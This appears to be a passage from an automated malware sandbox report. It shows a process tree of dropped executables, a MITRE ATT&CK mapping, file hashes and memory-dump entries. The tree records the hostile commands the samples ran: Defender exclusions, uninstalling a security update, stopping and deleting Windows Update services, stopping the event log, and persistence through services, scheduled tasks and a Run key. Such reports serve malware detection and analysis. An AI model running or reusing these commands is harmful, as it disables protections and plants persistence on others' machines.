    "C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3288
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2812
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4352
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1556
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4660
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2008
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3504
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1536
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4512
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3992
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1336
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2816
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:3720
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4752
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3944
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:3448
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4796
- - C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe
    "C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1784
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2180
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1980
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4112
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2680
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2908
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1052
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:3496
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:2656
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:1552
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        
        PID:820
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:2880
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1204
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:3920
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4240
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3548
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4220
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:4916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      PID:4064
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:2416
- - C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe
    "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5052
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4744
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3528

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3724

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1036

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3164

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4476

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:5028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:32

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1648

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:4216

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1800

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4392

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4556
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2304
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2260
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1784
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3352
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2160
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:264
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5100
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3956
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1456
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:380
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2016
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:764
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1836
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:312
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fdde58bc8c126b343074010d7ae936eb

SHA1
28beb3262a14f66b372798ce58615d6bec3ffaf9

SHA256
41dff338c9e9c3ccae73bcc7426bdd7c7a9edac43e31249399efa39ef4a1a1f3

SHA512
fba4ae139124a2e526ed7eb2e3d5cf42468a4e04d4a5ff3b295e891f4ae9c5361efeb14d2649b06cd7320594ba6266468159591cee7f7c91b546c26eb01806b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yax3knk2.ftr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Windows\System32\Tasks\dialersvc32

Filesize
3KB

MD5
e74cdbb2e49ade4c26112f0c1af9d32a

SHA1
738d46f00011b84ed87fdd3c499eb49c4133d7ce

SHA256
91cf026896f979b39b52cf462bfacbe7b119c35375fa5ccddb85cad27d8b0450

SHA512
d17215860345a44637622567f3ac3a037c8cc5ebe845ab9405947a403d5e5455963b804d3dd1db5e1dc17e92e0bd9703f03b15a5e4d584cd52b2f020c47cd1f4

Download Submit
C:\Windows\System32\Tasks\dialersvc64

Filesize
3KB

MD5
c646fae02735d283c0b00247aa24c72b

SHA1
7fcc083fd6ac522373c36032ce710be3f3e7c313

SHA256
6d277537f78d421094626ba50d82a54a25e98c078df281414f42198a141248f4

SHA512
5c50b1d4d0b96b0020cae067d6e8816ca3d81196eedd7db308766991dc2f708ec71b7cb6ebd20febb94d323c4c01d7f513b996dcd3836d1b75ef941b3b95ab40

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
de7c9943d92642016c5879effd88e49a

SHA1
4654c0a6a3de14013376b78c7c94b3826d82c823

SHA256
2c4678ac135e911fec087a8364c7e05e9818ad7e4e5c0c6b85ee47855ccb2454

SHA512
200d1ef5e70fffecf9479a448a8989941985f00aa1477eea2f922e15feb638b623836316ced1111a631c4d0b21b694a506ebe5f4ff20684c6da9eeea4f2afd00

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
52dc0f8e208dbaef9b1f052b93bd7bd3

SHA1
4adaaf035dab1ef6bc4f68e4c3223745cebb1c56

SHA256
9eb7e5d34dba1d8e5bfde87eb2b4405c1892fe7749cab998a664cd86e4d80da6

SHA512
f577077a59838fac0eb66843ff680591b24cccb55e78266c051ade633e28152111aed7de720283b43288367b19b49adaa4ea53b1ed6ad5c7f0e23243aa43d156

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
fab8217681964548f0380ed128e9639b

SHA1
3a90fd32789c55aa37c1e8d07296bae1af2cc41b

SHA256
25eb882c85835f455276406dd1b04f4b561850e660428dbe19f524e81d5a445b

SHA512
863e36e2dbaa09be5646d5241c1ae99b17fb39bf756a60a137455851881a33f0f45090e587b2b6a4652ed841997fe0e6abc9e63d008d9df46acf8a167c1ebe71

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
e591932dfe988c7f6781492d30e39bc3

SHA1
534197b60be5ad75bb4f5b2e50c87949e3845455

SHA256
ff560ebabfc79363a0543f0e125c44b39639d118350c413d2489bf3a417bee3e

SHA512
f509d0e1afec558a7279e50b87545718f479682399ef1babb9b2106363088ce8ceef5ac80b2cbb553f546cd8650df343b9ced155c9a92c6f4bc515a3ab1b7331

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb2d67a3ce81d49ea15d68a31bb8591c

SHA1
4d36f1f26e1c570e2053388aed67ad4b4285589f

SHA256
5a41d38229fbeacff88b6ef08602db2a72a8dcc2f81392cb8ecd04027038b2cc

SHA512
ee4e50d84b6d31ee3648e5d2b295c0a1e6fe6ad7b0af73d2bdded5e321123a9159fd216daf39cb7f3cdb7f0fd003ce762b4e320503d91ffc22b4d631a3fa4aa9

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/376-97-0x000002716DD50000-0x000002716DD7B000-memory.dmp

Filesize
172KB

Download
memory/376-98-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/512-104-0x000002CF2D1B0000-0x000002CF2D1DB000-memory.dmp

Filesize
172KB

Download
memory/512-105-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/624-90-0x0000015B607A0000-0x0000015B607C4000-memory.dmp

Filesize
144KB

Download
memory/624-100-0x0000015B607D0000-0x0000015B607FB000-memory.dmp

Filesize
172KB

Download
memory/624-101-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/676-93-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/676-92-0x0000024617E90000-0x0000024617EBB000-memory.dmp

Filesize
172KB

Download
memory/968-107-0x000002C65BFD0000-0x000002C65BFFB000-memory.dmp

Filesize
172KB

Download
memory/968-108-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1028-114-0x0000022E0F4D0000-0x0000022E0F4FB000-memory.dmp

Filesize
172KB

Download
memory/1028-115-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1072-117-0x00000208D4F70000-0x00000208D4F9B000-memory.dmp

Filesize
172KB

Download
memory/1072-118-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1124-125-0x000002C208290000-0x000002C2082BB000-memory.dmp

Filesize
172KB

Download
memory/1124-126-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1140-129-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1140-128-0x0000019336B00000-0x0000019336B2B000-memory.dmp

Filesize
172KB

Download
memory/1160-140-0x00000230EC380000-0x00000230EC3AB000-memory.dmp

Filesize
172KB

Download
memory/1160-141-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1172-143-0x000001B2BB740000-0x000001B2BB76B000-memory.dmp

Filesize
172KB

Download
memory/1172-144-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1296-147-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1296-146-0x0000017CE0890000-0x0000017CE08BB000-memory.dmp

Filesize
172KB

Download
memory/1368-149-0x0000025B5C200000-0x0000025B5C22B000-memory.dmp

Filesize
172KB

Download
memory/1368-150-0x00007FFAD13B0000-0x00007FFAD13C0000-memory.dmp

Filesize
64KB

Download
memory/1720-42-0x000001E47E750000-0x000001E47E772000-memory.dmp

Filesize
136KB

Download
memory/2304-507-0x000001A924620000-0x000001A924626000-memory.dmp

Filesize
24KB

Download
memory/2304-503-0x000001A9245E0000-0x000001A9245EA000-memory.dmp

Filesize
40KB

Download
memory/2304-508-0x000001A924630000-0x000001A92463A000-memory.dmp

Filesize
40KB

Download
memory/2304-506-0x000001A9245F0000-0x000001A9245F8000-memory.dmp

Filesize
32KB

Download
memory/2304-440-0x000001A9243C0000-0x000001A9243DC000-memory.dmp

Filesize
112KB

Download
memory/2304-442-0x000001A9243E0000-0x000001A924495000-memory.dmp

Filesize
724KB

Download
memory/2304-443-0x000001A9243B0000-0x000001A9243BA000-memory.dmp

Filesize
40KB

Download
memory/2304-448-0x000001A924600000-0x000001A92461C000-memory.dmp

Filesize
112KB

Download
memory/2304-505-0x000001A924640000-0x000001A92465A000-memory.dmp

Filesize
104KB

Download
memory/2420-41-0x00007FF7FFAB0000-0x00007FF7FFD16000-memory.dmp

Filesize
2.4MB

Download
memory/2816-73-0x00007FFB105C0000-0x00007FFB1067E000-memory.dmp

Filesize
760KB

Download
memory/2816-72-0x00007FFB11330000-0x00007FFB11525000-memory.dmp

Filesize
2.0MB

Download
memory/2816-71-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2816-68-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2816-87-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2816-67-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2816-66-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2816-69-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4676-820-0x000002E029840000-0x000002E029880000-memory.dmp

Filesize
256KB

Download
memory/4744-39-0x000000001BBA0000-0x000000001BBF0000-memory.dmp

Filesize
320KB

Download
memory/4744-40-0x000000001C520000-0x000000001C5D2000-memory.dmp

Filesize
712KB

Download
memory/4920-32-0x00007FFAF2850000-0x00007FFAF3311000-memory.dmp

